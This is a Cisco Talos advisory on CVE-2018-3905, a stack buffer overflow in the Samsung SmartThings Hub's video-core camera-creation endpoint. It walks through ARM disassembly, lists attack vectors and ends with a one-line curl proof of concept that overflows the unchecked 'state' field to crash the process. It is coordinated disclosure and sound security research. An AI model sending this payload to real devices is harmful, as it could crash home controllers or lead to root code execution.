Talos Vulnerability Report

TALOS-2018-0575

Samsung SmartThings Hub video-core Camera Creation Code Execution Vulnerability

July 26, 2018
CVE Number

CVE-2018-3905

Summary

An exploitable buffer overflow vulnerability exists in the camera "create" feature of video-core's HTTP server of Samsung SmartThings Hub. The video-core process incorrectly extracts the "state" field from a user-controlled JSON payload, leading to a buffer overflow on the stack. An attacker can send an HTTP request to trigger this vulnerability.

Tested Versions

Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17

Product URLs

https://www.smartthings.com/products/smartthings-hub

CVSSv3 Score

8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Details

Samsung produces a series of devices aimed at controlling and monitoring a home, such as wall switches, LED bulbs, thermostats and cameras. One of those is the Samsung SmartThings Hub, a central controller which allows an end user to use their smartphone to connect to their house remotely and operate other devices through it. The hub board utilizes several systems on chips. The firmware in question is executed by an i.MX 6 SoloLite processor (Cortex-A9), which has an ARMv7-A architecture.

The firmware is Linux-based, and runs a series of daemons that interface with devices nearby via ethernet, ZigBee, Z-Wave and Bluetooth protocols. Additionally, the hubCore process is responsible for communicating with the remote SmartThings servers via a persistent TLS connection. These servers act as a bridge that allows for secure communication between the smartphone application and the hub. End users can simply install the SmartThings mobile application on their smartphone to control the hub remotely.

One of the features of the hub is that it connects to smart cameras, configures them and looks at their livestreams. For testing, we set up the Samsung SmartCam SNH-V6414BN on the hub. Once done, the livestream can be displayed by the smartphone application by connecting either to the remote SmartThings servers, or directly to the camera, if they're both in the same subnetwork.

Inside the hub, the livestream is handled by the video-core process, which uses ffmpeg to connect via RTSP to the smart camera in its same local network, and at the same time, provides a streamable link on the smartphone application.

The remote SmartThings servers have the possibility to communicate with the video-core process by sending messages in the persistent TLS connection, established by the hubCore process. These messages can encapsulate an HTTP request, which hubCore would relay directly to the HTTP server exposed by video-core. The HTTP server listens on port 3000, bound to the localhost address, so a local connection is needed to perform this request.

We identified a vulnerable request that can be exploited to achieve code execution on the video-core process, which is running as root. By sending a POST request for the "/cameras" path, it's possible to add a new camera to the hub.

Such request is handled by function sub_48A14:

.text:00048A14     sub_48A14
.text:00048A14
.text:00048A14     dest   = -0x4364
.text:00048A14     var_4300= -0x4300
.text:00048A14     var_4200= -0x4200
.text:00048A14     var_4000= -0x4000
.text:00048A14     var_3E80= -0x3E80
.text:00048A14     var_3C80= -0x3C80
.text:00048A14     var_3A80= -0x3A80
.text:00048A14     var_2040= -0x2040
.text:00048A14     arg_0  =  4
.text:00048A14     buffer =  8
.text:00048A14     arg_8  =  0xC
.text:00048A14     arg_10 =  0x14
.text:00048A14
.text:00048A14 000        MOV             R12, #:lower16:dword_C4DCC
.text:00048A18 000        STMFD           SP!, {R4-R11,LR}
.text:00048A1C 024        MOVT            R12, #:upper16:dword_C4DCC
.text:00048A20 024        ADD             R11, SP, #0x20
.text:00048A24 024        SUB             SP, SP, #0x4300
.text:00048A28 4324       MOV             R5, R3
.text:00048A2C 4324       SUB             SP, SP, #0x54
...
.text:00048A8C 4378       BL              http_required_json_parameters  ; [1]
.text:00048A90 4378       MOV             R5, R0
.text:00048A94 4378       SUB             R0, R11, #-var_4000
.text:00048A98 4378       MOV             R1, R6
.text:00048A9C 4378       MOV             R2, #0x2044
.text:00048AA0 4378       SUB             R0, R0, #0xAC
.text:00048AA4 4378       BL              memset
.text:00048AA8 4378       SUB             R0, R11, #-var_4000
.text:00048AAC 4378       SUB             R0, R0, #0xAC
.text:00048AB0 4378       BL              clear_buffers
.text:00048AB4 4378       CMP             R5, R6
.text:00048AB8 4378       BNE             loc_48ADC
...
.text:00048ADC     loc_48ADC
.text:00048ADC 000        MOV             R0, R4
.text:00048AE0 000        BL              json_tokener_parse             ; [2]
.text:00048AE4 000        SUBS            R5, R0, #0
.text:00048AE8 000        BEQ             loc_48BEC
.text:00048AEC 000        SUB             R0, R11, #-var_4000
.text:00048AF0 000        MOV             R1, R5
.text:00048AF4 000        SUB             R0, R0, #0xAC
.text:00048AF8 000        BL              sub_48438                      ; [3]

Note that the binary embeds the "json-c" library that is used to manage JSON objects.

The function initially calls http_required_json_parameters at [1] to verify that all the required parameters are specified in the JSON request, the parameters are: cameraId, locationId, dni, url. At [2] the function parses the JSON payload received in the request using json_tokener_parse, which returns a json_object. It then calls sub_48438 [3] passing the pointer to a local stack buffer and the json_object as parameters.

.text:00048438     sub_48438
.text:00048438
.text:00048438 000        STMFD           SP!, {R4-R9,LR}
.text:0004843C 01C        MOV             R4, R1
.text:00048440 01C        SUB             SP, SP, #0x244
.text:00048444 260        MOV             R1, #:lower16:aCameraid_1     ; "cameraId"
.text:00048448 260        MOV             R6, R0
.text:0004844C 260        ADD             R2, SP, #0x260+value
.text:00048450 260        MOV             R0, R4                        ; jso
.text:00048454 260        MOVT            R1, #:upper16:aCameraid_1     ; "cameraId"
.text:00048458 260        BL              json_object_object_get_ex     ; [4]
.text:0004845C 260        CMP             R0, #0
.text:00048460 260        BNE             loc_48488
...
.text:000485AC 260        MOV             R1, #:lower16:aLocationid_0   ; "locationId"
.text:000485B0 260        STR             R7, [R6,#4]
.text:000485B4 260        MOVT            R1, #:upper16:aLocationid_0   ; "locationId"
.text:000485B8 260        MOV             R0, R4                        ; jso
.text:000485BC 260        ADD             R2, SP, #0x260+value
.text:000485C0 260        BL              json_object_object_get_ex     ; [4]
.text:000485C4 260        CMP             R0, #0
.text:000485C8 260        BNE             loc_48638
...
.text:000486FC 260        MOV             R1, #:lower16:aDni            ; "dni"
.text:00048700 260        STR             R7, [R6,#0x208]
.text:00048704 260        MOVT            R1, #:upper16:aDni            ; "dni"
.text:00048708 260        MOV             R0, R4                        ; jso
.text:0004870C 260        ADD             R2, SP, #0x260+value
.text:00048710 260        BL              json_object_object_get_ex     ; [4]
.text:00048714 260        CMP             R0, #0
.text:00048718 260        BNE             loc_48790
...
.text:00048850 260        MOV             R1, #:lower16:aUrl_0          ; "url"
.text:00048854 260        STR             R7, [R6,#0x40C]
.text:00048858 260        MOVT            R1, #:upper16:aUrl_0          ; "url"
.text:0004885C 260        MOV             R0, R4                        ; jso
.text:00048860 260        ADD             R2, SP, #0x260+value
.text:00048864 260        BL              json_object_object_get_ex     ; [4]
.text:00048868 260        CMP             R0, #0
.text:0004886C 260        BNE             loc_488DC
...
.text:00048938 260        MOV             R1, #:lower16:aState          ; "state"
.text:0004893C 260        STR             R0, [R6,#0xE24]
.text:00048940 260        MOVT            R1, #:upper16:aState          ; "state"
.text:00048944 260        STRH            R3, [R12,#0xC]
.text:00048948 260        MOV             R0, R4                        ; jso
.text:0004894C 260        STRB            LR, [R6,#0xE2E]
.text:00048950 260        BL              json_object_object_get_ex     ; [4]
.text:00048954 260        CMP             R0, #0
.text:00048958 260        BNE             loc_489E0
...
.text:000489E0     loc_489E0
.text:000489E0 260        LDR             R0, [SP,#0x260+value]
.text:000489E4 260        BL              json_object_to_json_string    ; [5]
.text:000489E8 260        MOV             R7, R0
.text:000489EC 260        BL              strlen                        ; [6]
.text:000489F0 260        MOV             R4, R0
.text:000489F4 260        ADD             R0, R6, #0x810
.text:000489F8 260        MOV             R1, R7
.text:000489FC 260        MOV             R2, R4
.text:00048A00 260        ADD             R0, R0, #8
.text:00048A04 260        BL              memcpy                        ; [7]

The purpose of this function is to extract each parameter and store it in the buffer passed as argument. Each parameter is extracted using the following sequence:

- Call to `json_object_object_get_ex` [4] and `json_object_to_json_string` [5] for extracting a parameter by key name.
- Copy the parameter value in a buffer on the stack, using `strlen` [6] and `memcpy` [7].

Additionally, before calling memcpy, the parameters "cameraId", "locationId" and "dni" are verified using regular expressions, and the "url" parameter is simply truncated to a maximum length of 0x200. However, the "state" parameter is not sanitized in any way. In fact, we can see that the length value for the memcpy call [7] is set from the strlen [6] output of the source string itself. At high level this would be:

memcpy(stack_buffer, state, strlen(state));

Since state is controlled by the user, there is no restriction on the length of the copy operation, which allows for overflowing the stack buffer, and potentially arbitrary code execution.

We identified two different vectors that allow for exploiting this vulnerability:

  • Anyone able to impersonate the remote SmartThings servers can send arbitrary HTTP requests to hubCore that would be relayed without modification to the vulnerable video-core process.
  • SmartThings SmartApps allow for creating custom applications that can be either published directly into the device itself, or on the public marketplace. A SmartApp is executed inside the hubCore process, and is allowed to make any localhost connection. It is thus possible for a SmartApp to send arbitrary HTTP requests directly to the vulnerable video-core process.

A third vector might exist, but we decided not to test it to avoid damaging any live infrastructure. This would consist of sending a malicious request from the SmartThings mobile application to the remote SmartThings servers. In turn, depending on the remote APIs available, the servers could relay the malicious payload back to the device via the persistent TLS connection. To use this vector, an attacker would need to own a valid OAuth bearer token, or the relative username and password pair to obtain it.

Exploit Proof of Concept

The following proof of concept shows how to crash the video-core process:

$ curl -X POST "http://127.0.0.1:3000/cameras" -d '{"cameraId":"00000000-0000-0000-0000-000000000000","locationId":"00000000-0000-0000-0000-000000000000","dni":"000000000000","url":"x","state":"'$(perl -e 'print "A"x700')'"}'

Timeline

2018-04-16 - Vendor Disclosure
2018-05-23 - Discussion with vendor/review of timeline for disclosure
2018-07-17 - Vendor patched
2018-07-26 - Public Release

Credit

Discovered by Claudio Bozzato of Cisco Talos.